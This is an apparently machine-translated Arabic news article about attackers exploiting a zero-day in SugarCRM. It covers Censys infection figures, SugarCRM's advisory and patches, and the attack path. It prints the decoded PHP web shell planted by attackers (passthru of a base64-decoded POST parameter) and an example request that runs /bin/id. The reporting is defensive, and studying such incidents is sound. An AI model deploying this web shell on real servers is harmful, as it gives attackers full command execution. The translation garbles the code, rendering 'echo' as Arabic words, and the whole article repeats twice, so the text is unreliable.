المئات من خوادم SugarCRM المصابة باستغلال خطير في البرية
المئات من خوادم SugarCRM المصابة باستغلال خطير في البرية
تكبير
على مدار الأسبوعين الماضيين ، استغل المتسللون ثغرة خطيرة في نظام SugarCRM (إدارة علاقات العملاء) لإصابة المستخدمين ببرامج ضارة تمنحهم التحكم الكامل في خوادمهم.
بدأت الثغرة الأمنية يوم الصفر عندما تم نشر كود الاستغلال على الإنترنت في أواخر ديسمبر. وصفه الشخص الذي نشر الاستغلال بأنه تجاوز للمصادقة مع تنفيذ التعليمات البرمجية عن بُعد ، مما يعني أنه يمكن للمهاجم استخدامه لتشغيل تعليمات برمجية ضارة على خوادم ضعيفة دون الحاجة إلى بيانات اعتماد. نشرت SugarCRM منذ ذلك الحين مراجعة تؤكد هذا الوصف. تضمنت عملية الاستغلال أيضًا العديد من عمليات "dorks" ، وهي عمليات بحث بسيطة على الويب يمكن للأشخاص إجراؤها لتحديد مواقع الخوادم المعرضة للخطر على الإنترنت.
قال مارك إلزي ، كبير الباحثين الأمنيين في خدمة مراقبة الشبكة Censys ، في رسالة بريد إلكتروني أنه اعتبارًا من 11 يناير ، اكتشفت الشركة 354 خوادم SugarCRM المصابة باستخدام اليوم صفر. يمثل هذا ما يقرب من 12٪ من إجمالي 3.059 خوادم SugarCRM التي تم اكتشافها بواسطة Censys. وفي الأسبوع الماضي ، كانت الإصابات أعلى في الولايات المتحدة ، حيث بلغت 90 ، تليها ألمانيا وأستراليا وفرنسا. في تحديث يوم الثلاثاء ، قال Censys إن عدد الإصابات لم يزداد كثيرًا منذ المنشور الأصلي.
أتاحت إرشادات SugarCRM ، التي نُشرت في 5 يناير ، الإصلاحات وأوضحت أنه تم تطبيقها بالفعل على الخدمة المستندة إلى مجموعة النظراء. كما نصح المستخدمين الذين كانت مثيلاتهم تعمل خارج SugarCloud أو SugarCRM التي تدير الاستضافة لتثبيت التصحيحات. وقال الاستشاري إن الثغرة أثرت على حلول برامج Sugar Sell و Serve و Enterprise و Professional و Ultimate. لم يؤثر ذلك على برنامج Sugar Market.
يعمل تجاوز المصادقة ، وفقًا لـ Censys ، ضد الدليل /index.php/. "بعد نجاح تجاوز المصادقة ، يتم الحصول على ملف تعريف ارتباط من الخدمة وإرسال طلب POST ثانوي إلى المسار '/cache/images/sweet.phar' الذي يقوم بتنزيل ملف PNG صغير مشفر يحتوي على كود PHP سيتم تنفيذه بواسطة الخادم عند إجراء طلب ملف آخر "، أضاف باحثو الشركة.
عندما يتم تحليل الملف الثنائي باستخدام برنامج تفريغ سداسي عشرية وفك تشفيره ، يترجم كود PHP تقريبًا إلى:
〈؟ php
صدى صوت "#####"؛
passthru (base64_decode ($ _ POST ["c"])) ؛
صدى صوت "#####"؛
؟〉
"هذا هو غلاف ويب بسيط يقوم بتشغيل أوامر بناءً على قيمة وسيطة طلب البحث المشفر باستخدام base64 لـ" c "(على سبيل المثال ،" POST /cache/images/sweet.phar؟c = "L2Jpbi9pZA ==" HTTP / 1.1 " ، والتي ستنفذ الأمر "/ bin / id" بنفس الأذونات مثل معرف المستخدم الذي يقوم بتشغيل خدمة الويب) ، توضح الرسالة.
توفر قذيفة الويب نافذة نصية يمكن للمهاجمين استخدامها كواجهة لتنفيذ الأوامر أو التعليمات البرمجية التي يختارونها على الأجهزة المعرضة للخطر. قال Ellzey من Censys أن الشركة لا تعرف سبب استخدام المهاجمين للقذائف بالضبط.
تقدم مراجعات Censys و SugarCRM مؤشرات على التسوية التي يمكن لعملاء SugarCRM استخدامها لتحديد ما إذا كان قد تم استهدافهم. يجب على مستخدمي المنتجات الضعيفة العثور على التصحيحات وتثبيتها في أسرع وقت ممكن.
على مدار الأسبوعين الماضيين ، استغل المتسللون ثغرة خطيرة في نظام SugarCRM (إدارة علاقات العملاء) لإصابة المستخدمين ببرامج ضارة تمنحهم التحكم الكامل في خوادمهم.
بدأت الثغرة الأمنية يوم الصفر عندما تم نشر كود الاستغلال على الإنترنت في أواخر ديسمبر. وصفه الشخص الذي نشر الاستغلال بأنه تجاوز للمصادقة مع تنفيذ التعليمات البرمجية عن بُعد ، مما يعني أنه يمكن للمهاجم استخدامه لتشغيل تعليمات برمجية ضارة على خوادم ضعيفة دون الحاجة إلى بيانات اعتماد. نشرت SugarCRM منذ ذلك الحين مراجعة تؤكد هذا الوصف. تضمنت عملية الاستغلال أيضًا العديد من عمليات "dorks" ، وهي عمليات بحث بسيطة على الويب يمكن للأشخاص إجراؤها لتحديد مواقع الخوادم المعرضة للخطر على الإنترنت.
قال مارك إلزي ، كبير الباحثين الأمنيين في خدمة مراقبة الشبكة Censys ، في رسالة بريد إلكتروني أنه اعتبارًا من 11 يناير ، اكتشفت الشركة 354 خوادم SugarCRM المصابة باستخدام اليوم صفر. يمثل هذا ما يقرب من 12٪ من إجمالي 3.059 خوادم SugarCRM التي تم اكتشافها بواسطة Censys. وفي الأسبوع الماضي ، كانت الإصابات أعلى في الولايات المتحدة ، حيث بلغت 90 ، تليها ألمانيا وأستراليا وفرنسا. في تحديث يوم الثلاثاء ، قال Censys إن عدد الإصابات لم يزداد كثيرًا منذ المنشور الأصلي.
أتاحت إرشادات SugarCRM ، التي نُشرت في 5 يناير ، الإصلاحات وأوضحت أنه تم تطبيقها بالفعل على الخدمة المستندة إلى مجموعة النظراء. كما نصح المستخدمين الذين كانت مثيلاتهم تعمل خارج SugarCloud أو SugarCRM التي تدير الاستضافة لتثبيت التصحيحات. وقال الاستشاري إن الثغرة أثرت على حلول برامج Sugar Sell و Serve و Enterprise و Professional و Ultimate. لم يؤثر ذلك على برنامج Sugar Market.
يعمل تجاوز المصادقة ، وفقًا لـ Censys ، ضد الدليل /index.php/. "بعد نجاح تجاوز المصادقة ، يتم الحصول على ملف تعريف ارتباط من الخدمة وإرسال طلب POST ثانوي إلى المسار '/cache/images/sweet.phar' الذي يقوم بتنزيل ملف PNG صغير مشفر يحتوي على كود PHP سيتم تنفيذه بواسطة الخادم عند إجراء طلب ملف آخر "، أضاف باحثو الشركة.
عندما يتم تحليل الملف الثنائي باستخدام برنامج تفريغ سداسي عشرية وفك تشفيره ، يترجم كود PHP تقريبًا إلى:
〈؟ php
صدى صوت "#####"؛
passthru (base64_decode ($ _ POST ["c"])) ؛
صدى صوت "#####"؛
؟〉
"هذا هو غلاف ويب بسيط يقوم بتشغيل أوامر بناءً على قيمة وسيطة طلب البحث المشفر باستخدام base64 لـ" c "(على سبيل المثال ،" POST /cache/images/sweet.phar؟c = "L2Jpbi9pZA ==" HTTP / 1.1 " ، والتي ستنفذ الأمر "/ bin / id" بنفس الأذونات مثل معرف المستخدم الذي يقوم بتشغيل خدمة الويب) ، توضح الرسالة.
توفر قذيفة الويب نافذة نصية يمكن للمهاجمين استخدامها كواجهة لتنفيذ الأوامر أو التعليمات البرمجية التي يختارونها على الأجهزة المعرضة للخطر. قال Ellzey من Censys أن الشركة لا تعرف سبب استخدام المهاجمين للقذائف بالضبط.
تقدم مراجعات Censys و SugarCRM مؤشرات على التسوية التي يمكن لعملاء SugarCRM استخدامها لتحديد ما إذا كان قد تم استهدافهم. يجب على مستخدمي المنتجات الضعيفة العثور على التصحيحات وتثبيتها في أسرع وقت ممكن.
تكبير
